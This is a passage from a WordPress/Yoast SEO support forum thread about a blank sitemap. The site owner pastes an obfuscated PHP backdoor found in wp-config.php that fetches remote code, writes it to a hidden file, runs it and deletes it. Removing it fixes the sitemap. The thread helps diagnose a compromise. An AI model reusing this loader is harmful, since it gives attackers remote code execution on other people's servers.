Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    Sa?a

    (@stodorovic)

    As I already thought reset indexables can’t help because sitemaps don’t use these tables. Anyway, it seems that you didn’t start “Optimization” again or something else because “Indexable tables” aren’t created.

    I just checked again and I can get correct sitemaps via curl and encoded xml (eg.xm%6c), but it can’t work in modern browsers. I’m pretty sure that some PHP code check existence xml in REQUEST_URI. Please check wp-config.php, index.php, prepend php scripts,…

    It’s possible that you’ve installed some script (in the past) which removes white space and it breaks “XML requests”.

    Thread Starter WeDev.Africa

    (@mad2kx)

    @stodorovic I have the following in the wp-config. Totally new to me

    @ini_set('display_errors', '0');
    error_reporting(0);
    if (!$npDcheckClassBgp) {
    $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'md5'; $pass = "passwordremoved";
    if (ini_get('allow_url_fopen')) {
        function get_data_ya($url) {
            $data = file_get_contents($url);
            return $data;
        }
    }
    else {
        function get_data_ya($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
    }
    function wp_cd($fd, $fa="")
    {
       $fe = "wp_frmfunct";
       $len = strlen($fd);
       $ff = '';
       $n = $len>100 ? 8 : 2;
       while( strlen($ff)<$len )
       {
          $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
       }
       return $fd^$ff;
    }
    $reqw = $ay($ao($oa("$pass"), 'wp_function'));
    preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
    $dirs = glob("*", GLOB_ONLYDIR);
    foreach ($dirs as $dira) {
    	if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
    	$subdirs = glob("$dira/*", GLOB_ONLYDIR);
    	foreach ($subdirs as $subdira) {
    		if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
    	}
    }
    if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
    fwrite($hdl, "<?php\n$mtchs[1]\n?>");
    fclose($hdl);
    include("{$eb}.$algo");
    unlink("{$eb}.$algo");
    $npDcheckClassBgp = 'aue';
    }
    Thread Starter WeDev.Africa

    (@mad2kx)

    @stodorovic OK after doing some research someone claimed the website has been hacked. Now after removing the code I can finally access the sitemaps again. So thanks to you for asking me to check the wp-config.php carefully

    Plugin Support devnihil

    (@devnihil)

    @mad2kx Thanks for confirming that you were able to solve this, and for letting us know what caused it. We are going ahead and marking this issue as resolved but please let us know if you require any further assistance.

Viewing 13 replies - 1 through 13 (of 13 total)
  • The topic ‘Blank Sitemap GoDaddy’ is closed to new replies.